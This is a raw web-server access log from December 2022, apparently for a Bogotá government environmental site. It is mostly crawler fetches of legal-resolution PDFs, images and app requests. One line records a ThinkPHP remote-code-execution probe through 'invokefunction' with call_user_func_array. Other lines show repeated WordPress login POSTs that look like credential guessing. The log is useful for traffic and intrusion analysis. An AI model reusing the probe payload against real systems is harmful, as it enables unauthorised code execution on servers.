186.102.17.120 - - [03/Dec/2022:09:07:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/DhWo7pHrXYoOSthbXc8MIMOBxHVSvbEsdJKE9iBFa4ryY2rl/idfcGPHrcm8BqF0IEDSn8HQ+UbaZCa3gqaORG8QO2XJZUrLXupLsiET9H7UJ8Z0/VuDVkL/N81U7EPohNM0+/t2UnN7wqJh25G11e2I0ZnwRH8FLxluE0V/UKjMzLfmyMyLyvyDe7Nu64IbnNNCa9L028mRvRx//g7NP8ctHkrmusZdfYCzCEvUBFgbURUSZ+qBP/QLN0UKOhdO8VedcVAdiEKqHeTnaNSXQ9yHNH06onej5R5qfhEo1RmZvd9iB8Fe0Rsvw8sf8EjE/+sQskG3JqgQTFGm+RCJs+Lj9LJvp+pE=&u=U2FsdGVkX18Vh02wcB8KqCKgCItFGeImhK3ozeBtvreHevrZIr1yFd9ZdiltdrZ8&y=U2FsdGVkX1+HvkU1ktIb62y7jbnBECdtLfO+cGJH704RDVzO230ku1PjAvmlUPI3 HTTP/1.1" 200 196
186.102.17.120 - - [03/Dec/2022:09:07:03 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+yKiH4B8UdWYnGRPGH5T7qly7iqPKSsfgYelFDCFByReHoY+JMoxni HTTP/1.1" 200 31032
66.249.66.87 - - [03/Dec/2022:09:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202015/2074.pdf HTTP/1.1" 200 475909
66.249.66.85 - - [03/Dec/2022:09:07:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1767.pdf HTTP/1.1" 200 369871
66.249.66.85 - - [03/Dec/2022:09:07:24 -0500] "GET /BLA/resoluciones/AUTOS%202014/0819.pdf HTTP/1.1" 200 167596
201.245.192.253 - - [03/Dec/2022:09:07:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.85 - - [03/Dec/2022:09:07:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3552.pdf HTTP/1.1" 200 424668
66.249.66.85 - - [03/Dec/2022:09:07:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5143.pdf HTTP/1.1" 200 630562
66.249.66.86 - - [03/Dec/2022:09:07:45 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/Diligenciamiento%20libro%20operaciones.pdf HTTP/1.1" 404 1018
66.249.66.86 - - [03/Dec/2022:09:07:52 -0500] "GET /Publicaciones/2022EE296009.pdf HTTP/1.1" 404 228
66.249.66.86 - - [03/Dec/2022:09:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202014/7297.pdf HTTP/1.1" 200 569989
66.220.149.13 - - [03/Dec/2022:09:08:03 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
66.249.66.85 - - [03/Dec/2022:09:08:06 -0500] "GET /Publicaciones/2018EE265222.pdf HTTP/1.1" 404 228
114.119.158.165 - - [03/Dec/2022:09:08:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0347.pdf HTTP/1.1" 200 350468
157.55.39.39 - - [03/Dec/2022:09:08:09 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 442469
66.249.66.85 - - [03/Dec/2022:09:08:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0924.pdf HTTP/1.1" 200 243614
66.249.66.86 - - [03/Dec/2022:09:08:19 -0500] "GET /Publicaciones/2019EE193165.pdf HTTP/1.1" 404 228
66.249.66.85 - - [03/Dec/2022:09:08:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2057.pdf HTTP/1.1" 200 195939
66.249.66.85 - - [03/Dec/2022:09:08:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2633.pdf HTTP/1.1" 200 1253948
66.249.66.86 - - [03/Dec/2022:09:08:39 -0500] "GET /BLA/resoluciones/AUTOS%202017/0325.pdf HTTP/1.1" 200 300743
172.22.2.4 - - [03/Dec/2022:09:07:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.86 - - [03/Dec/2022:09:08:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1449.pdf HTTP/1.1" 200 624584
66.249.66.86 - - [03/Dec/2022:09:08:52 -0500] "GET /BLA/resoluciones/AUTOS%202017/2202.pdf HTTP/1.1" 200 760607
66.249.66.85 - - [03/Dec/2022:09:09:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1330.pdf HTTP/1.1" 200 331928
66.249.66.86 - - [03/Dec/2022:09:09:08 -0500] "GET /Publicaciones/2022EE309969.pdf HTTP/1.1" 200 231894
66.249.66.85 - - [03/Dec/2022:09:09:11 -0500] "GET /BLA/resoluciones/AUTOS%202014/0737.pdf HTTP/1.1" 200 540986
66.249.66.85 - - [03/Dec/2022:09:09:17 -0500] "GET /BLA/resoluciones/AUTOS%202018/2199.pdf HTTP/1.1" 200 1111621
66.249.66.86 - - [03/Dec/2022:09:09:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203201%20AL%203300/RESOLUCION%203283%20DE%202007.pdf HTTP/1.1" 200 378959
66.249.66.86 - - [03/Dec/2022:09:09:30 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
172.22.2.4 - - [03/Dec/2022:09:07:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
66.249.66.87 - - [03/Dec/2022:09:09:36 -0500] "GET /BLA/resoluciones/AUTOS%202013/2855.pdf HTTP/1.1" 200 1795883
66.249.66.88 - - [03/Dec/2022:09:09:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20601%20AL%20700/RESOLUCION%200688%20DE%202007.pdf HTTP/1.1" 200 1588303
66.249.66.85 - - [03/Dec/2022:09:09:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1576.pdf HTTP/1.1" 200 95217
216.245.221.92 - - [03/Dec/2022:09:09:48 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.88 - - [03/Dec/2022:09:09:54 -0500] "GET /Publicaciones/2022EE289991.pdf HTTP/1.1" 404 228
66.249.66.89 - - [03/Dec/2022:09:10:00 -0500] "GET /Publicaciones/2022EE286009.pdf HTTP/1.1" 404 228
66.249.66.89 - - [03/Dec/2022:09:10:06 -0500] "GET /Publicaciones/2022EE311787.pdf HTTP/1.1" 200 3130414
66.249.66.88 - - [03/Dec/2022:09:10:12 -0500] "GET /Publicaciones/2022EE311796.pdf HTTP/1.1" 200 249950
66.249.66.85 - - [03/Dec/2022:09:10:17 -0500] "GET /Publicaciones/2022EE311789.pdf HTTP/1.1" 200 232343
114.119.134.217 - - [03/Dec/2022:09:10:20 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20815%20del%2028%20de%20Diciembre%20de%202017.pdf HTTP/1.1" 200 5300108
114.119.141.103 - - [03/Dec/2022:09:10:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203001%20AL%203100/RESOLUCION%203019%20DE%202007.pdf HTTP/1.1" 200 1359736
167.94.146.58 - - [03/Dec/2022:09:10:36 -0500] "GET / HTTP/1.1" 200 319
167.94.146.58 - - [03/Dec/2022:09:10:36 -0500] "GET / HTTP/1.1" 200 319
167.94.146.58 - - [03/Dec/2022:09:10:36 -0500] "PRI * HTTP/2.0" 400 946
167.94.146.58 - - [03/Dec/2022:09:10:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
179.19.99.82 - - [03/Dec/2022:09:11:30 -0500] "-" 408 -
173.252.107.8 - - [03/Dec/2022:09:12:09 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.79.24 - - [03/Dec/2022:09:12:31 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
201.245.192.253 - - [03/Dec/2022:09:12:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
69.171.251.10 - - [03/Dec/2022:09:12:33 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
173.252.79.22 - - [03/Dec/2022:09:13:13 -0500] "GET /images/feria-servicios-12-mayo-principal.jpg HTTP/1.1" 200 44744
114.119.136.64 - - [03/Dec/2022:09:14:13 -0500] "GET /BLA/resoluciones/AUTOS%202017/3438.pdf HTTP/1.1" 200 334000
172.22.2.4 - - [03/Dec/2022:09:12:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [03/Dec/2022:09:14:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:14:10 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 32715
172.22.2.4 - - [03/Dec/2022:09:13:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
35.208.187.63 - - [03/Dec/2022:09:15:50 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 -
186.31.152.167 - - [03/Dec/2022:09:15:50 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.31.152.167 - - [03/Dec/2022:09:15:51 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.31.152.167 - - [03/Dec/2022:09:15:51 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.31.152.167 - - [03/Dec/2022:09:15:51 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.31.152.167 - - [03/Dec/2022:09:15:51 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.31.152.167 - - [03/Dec/2022:09:15:51 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.31.152.167 - - [03/Dec/2022:09:16:05 -0500] "POST /appsia/controlador HTTP/1.1" 200 3601
186.31.152.167 - - [03/Dec/2022:09:16:09 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
173.252.83.21 - - [03/Dec/2022:09:16:09 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
186.31.152.167 - - [03/Dec/2022:09:16:17 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
186.31.152.167 - - [03/Dec/2022:09:16:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.31.152.167 - - [03/Dec/2022:09:16:48 -0500] "POST /appsia/controlador HTTP/1.1" 200 7793
186.31.152.167 - - [03/Dec/2022:09:17:12 -0500] "POST /appsia/controlador HTTP/1.1" 200 6666
186.31.152.167 - - [03/Dec/2022:09:17:14 -0500] "POST /appsia/controlador HTTP/1.1" 200 9464
183.136.225.32 - - [03/Dec/2022:09:17:18 -0500] "GET / HTTP/1.1" 200 319
186.31.152.167 - - [03/Dec/2022:09:17:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 75706
201.245.192.253 - - [03/Dec/2022:09:17:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
114.119.131.210 - - [03/Dec/2022:09:18:27 -0500] "GET /BLA/resoluciones/AUTOS%202017/1115.pdf HTTP/1.1" 200 300207
168.119.101.10 - - [03/Dec/2022:09:18:50 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [03/Dec/2022:09:19:39 -0500] "HEAD / HTTP/1.1" 200 -
34.248.20.177 - - [03/Dec/2022:09:19:46 -0500] "HEAD / HTTP/1.1" 200 -
141.255.166.2 - - [03/Dec/2022:09:19:55 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Dec/2022:09:18:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Dec/2022:09:20:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41544
201.245.192.253 - - [03/Dec/2022:09:21:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41710
172.22.2.4 - - [03/Dec/2022:09:19:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
114.119.152.142 - - [03/Dec/2022:09:21:57 -0500] "GET /BLA/resoluciones/AUTOS%202016/2936.pdf HTTP/1.1" 200 609149
185.119.81.107 - - [03/Dec/2022:09:22:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [03/Dec/2022:09:22:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [03/Dec/2022:09:22:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [03/Dec/2022:09:22:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
183.136.225.32 - - [03/Dec/2022:09:22:54 -0500] "GET / HTTP/1.1" 200 319
183.136.225.32 - - [03/Dec/2022:09:22:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
64.124.8.46 - - [03/Dec/2022:09:23:07 -0500] "-" 408 -
216.245.221.92 - - [03/Dec/2022:09:24:39 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.42 - - [03/Dec/2022:09:24:55 -0500] "GET /images/fachada-secretaria-ambiente-15-octubre.jpg HTTP/1.1" 200 148853
172.22.2.4 - - [03/Dec/2022:09:24:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.52 - - [03/Dec/2022:09:26:32 -0500] "GET /portaldeninos/los-arboles/tips/ HTTP/1.1" 200 87677
172.22.2.4 - - [03/Dec/2022:09:25:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [03/Dec/2022:09:27:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
64.124.8.52 - - [03/Dec/2022:09:27:52 -0500] "GET /robots.txt HTTP/1.1" 404 1035
216.245.221.92 - - [03/Dec/2022:09:29:39 -0500] "HEAD / HTTP/1.1" 200 -
204.199.94.92 - - [03/Dec/2022:09:29:49 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
199.16.157.180 - - [03/Dec/2022:09:29:55 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
199.16.157.183 - - [03/Dec/2022:09:29:55 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
201.245.192.253 - - [03/Dec/2022:09:30:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41544
201.245.192.253 - - [03/Dec/2022:09:31:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41710
172.22.2.4 - - [03/Dec/2022:09:30:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [03/Dec/2022:09:32:24 -0500] "GET /BLA/resoluciones/AUTOS%202014/0418.pdf HTTP/1.1" 200 708074
201.245.192.253 - - [03/Dec/2022:09:32:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.85 - - [03/Dec/2022:09:32:26 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20383%20de%202018.pdf HTTP/1.1" 200 2064587
66.249.66.86 - - [03/Dec/2022:09:32:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1631.pdf HTTP/1.1" 200 289635
66.249.66.86 - - [03/Dec/2022:09:32:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3234.pdf HTTP/1.1" 200 305954
66.249.66.85 - - [03/Dec/2022:09:32:31 -0500] "GET /BLA/resoluciones/AUTOS%202009/0617.pdf HTTP/1.1" 200 121663
66.249.66.86 - - [03/Dec/2022:09:32:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2274.pdf HTTP/1.1" 200 459423
66.249.66.85 - - [03/Dec/2022:09:32:34 -0500] "GET /BLA/resoluciones/AUTOS%202016/1577.pdf HTTP/1.1" 200 675118
66.249.66.85 - - [03/Dec/2022:09:32:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6538.pdf HTTP/1.1" 200 75943
66.249.66.87 - - [03/Dec/2022:09:32:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1168.pdf HTTP/1.1" 200 1795780
66.249.66.89 - - [03/Dec/2022:09:32:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/0856.pdf HTTP/1.1" 200 96163
66.249.66.87 - - [03/Dec/2022:09:32:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2605.pdf HTTP/1.1" 200 156990
66.249.66.87 - - [03/Dec/2022:09:32:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3343.pdf HTTP/1.1" 200 610607
66.249.66.89 - - [03/Dec/2022:09:32:43 -0500] "GET /BLA/resoluciones/AUTOS%202014/5717.pdf HTTP/1.1" 200 521092
66.249.66.89 - - [03/Dec/2022:09:32:45 -0500] "GET /Publicaciones/2022EE245793.pdf HTTP/1.1" 404 228
66.249.66.89 - - [03/Dec/2022:09:32:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1235.pdf HTTP/1.1" 200 273353
66.249.66.89 - - [03/Dec/2022:09:32:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202301%20AL%202400/RESOLUCION%202337%20DE%202007.pdf HTTP/1.1" 200 272182
66.249.66.85 - - [03/Dec/2022:09:32:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4495.pdf HTTP/1.1" 200 498081
66.249.66.88 - - [03/Dec/2022:09:32:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1104.pdf HTTP/1.1" 200 291030
66.249.66.91 - - [03/Dec/2022:09:32:53 -0500] "GET /BLA/resoluciones/AUTOS%202014/5459.pdf HTTP/1.1" 200 1097580
66.249.66.87 - - [03/Dec/2022:09:32:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4404.pdf HTTP/1.1" 200 525153
172.22.2.4 - - [03/Dec/2022:09:31:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
66.249.66.91 - - [03/Dec/2022:09:32:56 -0500] "GET /BLA/resoluciones/AUTOS%202007/1784.pdf HTTP/1.1" 200 35284
157.55.39.105 - - [03/Dec/2022:09:32:56 -0500] "GET /images/ruda-prensa-principal-5-FEBRERO.jpg HTTP/1.1" 200 43225
66.249.66.87 - - [03/Dec/2022:09:32:57 -0500] "GET /Publicaciones/2022EE284941.pdf HTTP/1.1" 404 228
66.249.66.89 - - [03/Dec/2022:09:32:59 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/5752.pdf HTTP/1.1" 200 805977
66.249.66.89 - - [03/Dec/2022:09:33:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0638.pdf HTTP/1.1" 200 525299
66.249.66.91 - - [03/Dec/2022:09:33:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1170.pdf HTTP/1.1" 200 867178
66.249.66.89 - - [03/Dec/2022:09:33:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0217.pdf HTTP/1.1" 200 540387
66.249.66.93 - - [03/Dec/2022:09:33:04 -0500] "GET /BLA/resoluciones/AUTOS%202014/1362.pdf HTTP/1.1" 200 572468
66.249.66.90 - - [03/Dec/2022:09:33:06 -0500] "GET /BLA/resoluciones/AUTOS%202014/2473.pdf HTTP/1.1" 200 696867
66.249.66.93 - - [03/Dec/2022:09:33:07 -0500] "GET /BLA/resoluciones/AUTOS%202012/1128.pdf HTTP/1.1" 200 152383
66.249.66.94 - - [03/Dec/2022:09:33:09 -0500] "GET /BLA/resoluciones/AUTOS%202014/1478.pdf HTTP/1.1" 200 338655
66.249.66.90 - - [03/Dec/2022:09:33:10 -0500] "GET /Publicaciones/2020EE106176.pdf HTTP/1.1" 404 228
66.249.66.87 - - [03/Dec/2022:09:33:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201101%20AL%201200/RESOLUCION%201128%20DE%202007.pdf HTTP/1.1" 200 262757
66.249.66.88 - - [03/Dec/2022:09:33:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203101%20AL%203200/RESOLUCION%203178%20DE%202007.pdf HTTP/1.1" 200 218226
66.249.66.86 - - [03/Dec/2022:09:33:14 -0500] "GET /BLA/resoluciones/AUTOS%202017/0767.pdf HTTP/1.1" 200 340950
66.249.66.85 - - [03/Dec/2022:09:33:16 -0500] "GET /BLA/resoluciones/AUTOS%202014/2049.pdf HTTP/1.1" 200 699555
66.249.66.85 - - [03/Dec/2022:09:33:17 -0500] "GET /BLA/resoluciones/AUTOS%202007/1488.pdf HTTP/1.1" 200 31264
66.249.66.89 - - [03/Dec/2022:09:33:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1329.pdf HTTP/1.1" 200 316638
66.249.66.88 - - [03/Dec/2022:09:33:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4010.pdf HTTP/1.1" 200 494465
66.249.66.89 - - [03/Dec/2022:09:33:21 -0500] "GET /BLA/resoluciones/AUTOS%202014/4671.pdf HTTP/1.1" 200 545081
66.249.66.87 - - [03/Dec/2022:09:33:23 -0500] "GET /BLA/resoluciones/AUTOS%202017/3126.pdf HTTP/1.1" 200 507819
66.249.66.88 - - [03/Dec/2022:09:33:24 -0500] "GET /Publicaciones/2022EE286073.pdf HTTP/1.1" 404 228
66.249.66.88 - - [03/Dec/2022:09:33:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203001%20AL%203100/RESOLUCION%203002%20DE%202007.pdf HTTP/1.1" 200 605469
66.249.66.87 - - [03/Dec/2022:09:33:27 -0500] "GET /BLA/resoluciones/AUTOS%202015/6125.pdf HTTP/1.1" 200 585901
66.249.66.88 - - [03/Dec/2022:09:33:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2679.pdf HTTP/1.1" 200 7474083
66.249.66.88 - - [03/Dec/2022:09:33:33 -0500] "GET /BLA/resoluciones/AUTOS%202017/0804.pdf HTTP/1.1" 200 377451
66.249.66.86 - - [03/Dec/2022:09:33:33 -0500] "GET /BLA/resoluciones/AUTOS%202015/0720.pdf HTTP/1.1" 200 570287
66.249.66.85 - - [03/Dec/2022:09:33:35 -0500] "GET /BLA/resoluciones/AUTOS%202014/6158.pdf HTTP/1.1" 200 129869
66.249.66.86 - - [03/Dec/2022:09:33:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2160.pdf HTTP/1.1" 200 357703
66.249.66.92 - - [03/Dec/2022:09:33:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3354.pdf HTTP/1.1" 200 557885
66.249.66.85 - - [03/Dec/2022:09:33:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0822.pdf HTTP/1.1" 200 395871
66.249.66.89 - - [03/Dec/2022:09:33:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/2532.pdf HTTP/1.1" 200 709466
66.249.66.88 - - [03/Dec/2022:09:33:41 -0500] "GET /BLA/resoluciones/AUTOS%202010/0101.pdf HTTP/1.1" 200 395976
66.249.66.88 - - [03/Dec/2022:09:33:42 -0500] "GET /BLA/resoluciones/AUTOS%202011/5956.pdf HTTP/1.1" 200 554670
66.249.66.87 - - [03/Dec/2022:09:33:44 -0500] "GET /BLA/resoluciones/AUTOS%202015/0159.pdf HTTP/1.1" 200 193623
66.249.66.65 - - [03/Dec/2022:09:33:46 -0500] "GET /BLA/resoluciones/AUTOS%202014/1009.pdf HTTP/1.1" 200 420148
207.46.13.120 - - [03/Dec/2022:09:33:47 -0500] "GET /images/Mirla%20Com%C3%BAn%20SDA%20(1)%20(1).jpeg HTTP/1.1" 404 1034
66.249.66.93 - - [03/Dec/2022:09:33:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3943.pdf HTTP/1.1" 200 593261
66.249.66.88 - - [03/Dec/2022:09:33:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/3612.pdf HTTP/1.1" 200 325549
66.249.66.90 - - [03/Dec/2022:09:33:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2241.pdf HTTP/1.1" 200 280381
66.249.66.93 - - [03/Dec/2022:09:33:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1341.pdf HTTP/1.1" 200 492659
66.249.66.88 - - [03/Dec/2022:09:33:52 -0500] "GET /BLA/resoluciones/AUTOS%202012/2707.pdf HTTP/1.1" 200 242681
66.249.66.89 - - [03/Dec/2022:09:33:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1947.pdf HTTP/1.1" 200 305654
66.249.66.93 - - [03/Dec/2022:09:33:55 -0500] "GET /Publicaciones/2022EE311808.pdf HTTP/1.1" 200 231877
66.249.66.94 - - [03/Dec/2022:09:33:56 -0500] "GET /Publicaciones/2022EE311507.pdf HTTP/1.1" 200 347615
66.249.66.86 - - [03/Dec/2022:09:33:58 -0500] "GET /Publicaciones/2022EE311783.pdf HTTP/1.1" 200 231874
66.249.66.65 - - [03/Dec/2022:09:33:59 -0500] "GET /Publicaciones/2022EE311786.pdf HTTP/1.1" 200 3200655
216.245.221.92 - - [03/Dec/2022:09:34:39 -0500] "HEAD / HTTP/1.1" 200 -
117.222.226.208 - - [03/Dec/2022:09:34:40 -0500] "GET / HTTP/1.1" 200 319
114.119.158.118 - - [03/Dec/2022:09:35:57 -0500] "GET /BLA/resoluciones/AUTOS%202016/2874.pdf HTTP/1.1" 200 374856
201.245.192.253 - - [03/Dec/2022:09:37:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [03/Dec/2022:09:36:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:38:03 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
66.249.66.93 - - [03/Dec/2022:09:38:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.66.89 - - [03/Dec/2022:09:38:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.66.86 - - [03/Dec/2022:09:38:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [03/Dec/2022:09:38:40 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
66.249.66.89 - - [03/Dec/2022:09:38:44 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
172.22.2.4 - - [03/Dec/2022:09:37:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50149
66.249.66.91 - - [03/Dec/2022:09:38:46 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
66.249.66.91 - - [03/Dec/2022:09:38:48 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
185.119.81.102 - - [03/Dec/2022:09:38:52 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [03/Dec/2022:09:38:53 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [03/Dec/2022:09:39:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:38:04 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 59779
64.124.8.25 - - [03/Dec/2022:09:40:44 -0500] "-" 408 -
201.245.192.253 - - [03/Dec/2022:09:40:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41544
201.245.192.253 - - [03/Dec/2022:09:41:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41710
201.245.192.253 - - [03/Dec/2022:09:42:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.86 - - [03/Dec/2022:09:42:40 -0500] "GET /Publicaciones/2022EE309450.pdf HTTP/1.1" 200 231908
157.55.39.39 - - [03/Dec/2022:09:42:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 442469
186.102.41.77 - - [03/Dec/2022:09:43:10 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/pp6RX3n37uHiVDzm805Wi+xbYHEF91n31FBSIbDrlisalRWaErnjaK7Hy4L5EFTtvikfIQxzS10UEJMykXbpGxxuA6VGF2iHQcLCBL/scZhWUm0ZVUEpgatPmZgOM+aaU+LndFtZ5hZYDL9eniNnenxDJz29iQpViTQFK+AwPR3Cs5t1NLPVGsdXsKD8olzcmNGYEqpnF1NVxIJ+V5JZV7XCqVhQmQraQetj0pdVJXrafHQYAn98NjUtOHTUY4+hEsqIbdwjxYw==&u=U2FsdGVkX1+CApxPYoPB8v81AsBmPj6r0eVoqLfQ2tw=&y=U2FsdGVkX19CxFV1UJXq2E9Qnw/2asuoHzwwIw+i4E73pnN+2m7t6UZyIGHbwFJU HTTP/1.1" 200 26
